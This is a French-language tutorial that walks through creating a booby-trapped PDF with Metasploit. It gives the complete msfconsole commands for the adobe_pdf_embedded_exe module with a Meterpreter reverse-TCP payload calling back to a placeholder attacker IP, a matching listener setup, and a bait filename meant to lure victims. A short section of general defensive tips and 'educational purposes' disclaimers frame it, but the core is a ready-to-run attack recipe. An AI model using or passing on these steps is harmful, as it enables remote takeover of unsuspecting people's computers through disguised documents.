Inclure un backdoor dans un PDF avec Metasploit

Avant-Propos

Avant toute chose, je tiens à préciser que cet article est à titre PUREMENT EDUCATIF et n’est en AUCUN CAS destiné à une utilisation illégale ou frauduleuse.

Cet article a pour but de vous instruire de façon ETHIQUE d’une part comment exploiter des vulnérabilités afin d’injecter un payload « malveillant » dans un fichier PDF et d’autre part comment s’en protéger.

Introduction

Les documents PDF sont largement utilisés pour partager des informations sous une forme lisible et sécurisée. Cependant, comme tout autre type de fichier, un PDF peut être exploité pour exécuter du code malveillant. Les attaquants peuvent utiliser Metasploit pour injecter un backdoor dans un fichier PDF, permettant ainsi un accès distant à la machine de la victime une fois le document ouvert.

Qu’est-ce qu’un Backdoor ?

Un backdoor (ou porte dérobée) est un programme ou une fonctionnalité cachée qui permet à un attaquant d’obtenir un accès non autorisé à un système. Une fois installé, un backdoor peut :

• Exécuter des commandes à distance.
• Accéder aux fichiers et aux mots de passe.
• Enregistrer les frappes clavier.
• Contrôler la webcam et le microphone.
• etc.

Qu’est-ce que Metasploit et Meterpreter ?

Metasploit Framework

Metasploit est une plateforme de test d’intrusion open-source qui permet aux chercheurs en sécurité et aux attaquants d’exploiter les failles des systèmes informatiques. Il inclut des modules pour :

• La création de payloads (charges utiles malveillantes).
• L’exploitation de vulnérabilités connues.
• L’établissement d’une connexion avec une machine cible.

Meterpreter

Meterpreter est un payload avancé qui fonctionne en mémoire, évitant ainsi d’être détecté par les antivirus. Il permet :

• De naviguer sur la machine cible sans être détecté.
• D’exécuter des commandes en arrière-plan.
• D’obtenir des accès administratifs.

Création d’un PDF piégé avec Metasploit en 2 étapes seulement

📌 Prérequis

Avant de commencer, assurez-vous d’avoir :

• Kali Linux ou Metasploit installé sur votre système.
• Un fichier PDF légitime pour masquer le payload.
• Une connexion réseau entre l’attaquant et la victime.

📌 Étape 1 : Génération du fichier PDF malveillant

Dans Metasploit, utilisez la commande suivante pour créer un PDF infecté :

msfconsole
use exploit/windows/fileformat/adobe_pdf_embedded_exe
set FILENAME document.pdf
set INFILENAME gagner_beaucoup_de_fric.pdf
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <IP_ATTAQUANT>
set LPORT 4444
exploit

📌 Explication des paramètres :

• FILENAME → Nom du fichier généré.
• INFILENAME → Document PDF légitime à utiliser comme couverture.
• PAYLOAD → Type de charge utile (ici, un shell Meterpreter inversé).
• LHOST → Adresse IP de l’attaquant.
• LPORT → Port d’écoute de la connexion inversée.

Une fois la commande exécutée, un nouveau fichier PDF est créé avec le payload injecté.

📌 Étape 2 : Mise en place du listener Metasploit

Avant d’envoyer le fichier piégé à la cible, il faut configurer un listener pour écouter les connexions entrantes :

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <IP_ATTAQUANT>
set LPORT 4444
exploit

Lorsque la victime ouvre le PDF, une connexion Meterpreter s’établira automatiquement, permettant à l’attaquant de prendre le contrôle du système.

Comment se protéger contre ce type d’attaque ?

Il est crucial de savoir comment se défendre contre ce genre de menace. Voici quelques bonnes pratiques :

✅ 1. Vérifier l’origine des fichiers PDF

N’ouvrez jamais un fichier PDF provenant d’une source inconnue ou douteuse.

✅ 2. Désactiver l’exécution des scripts dans Adobe Reader

Si vous utilisez une vieille version de Adobe Acrobat Reader, désactivez JavaScript :

• Édition → Préférences → JavaScript
• Décochez « Activer Acrobat JavaScript »

✅ 3. Utiliser un antivirus et un anti-malware

Les solutions comme Windows Defender (inclus par défaut dans Windows), Malwarebytes ou Bitdefender peuvent détecter et bloquer les PDF infectés.

✅ 4. Analyser le fichier avant ouverture

Utilisez VirusTotal pour scanner un fichier suspect avant de l’ouvrir.

✅ 5. Appliquer les mises à jour de sécurité

Un système à jour réduit les risques d’exploitation de vulnérabilités connues.

📌 NB :

De nos jours, la plupart des ordinateurs et des systèmes sont conçus pour être à l’abri de ce genre d’attaque, donc à moins que ce ne soit fait exprès ou que la cible soit vraiment peu éduquée à la sécurité, ce genre d’attaque a peu de chances de réussir.

Une attaque par backdoor dans un PDF est plus probable sur une machine qui :

• N’a pas d’antivirus ou utilise un antivirus inefficace (Certains antivirus peuvent détecter ce type de menace, mais pas toujours).
• Utilise un pare-feu mal configuré ou inexistant (Un pare-feu bien réglé peut bloquer la connexion sortante du malware).
• Exécute un système d’exploitation obsolète ou non mis à jour (Les mises à jour de sécurité corrigent les vulnérabilités utilisées par ce type d’attaque).
• Utilise une ancienne version de lecteur PDF vulnérable (Certains exploits ciblent spécifiquement les versions obsolètes d’Adobe Reader ou d’autres lecteurs).
• Se trouve sur un réseau non sécurisé (Un réseau Wi-Fi public ou mal protégé facilite certaines attaques).
• A un utilisateur peu méfiant qui ouvre des fichiers PDF inconnus (La plus grande faille de sécurité reste souvent l’utilisateur lui-même).

⚠️ RAPPEL IMPORTANT : Cet article est uniquement destiné à des fins éducatives et doit être utilisé dans un cadre légal (tests de sécurité avec autorisation). Toute utilisation malveillante est illégale et passible de sanctions pénales.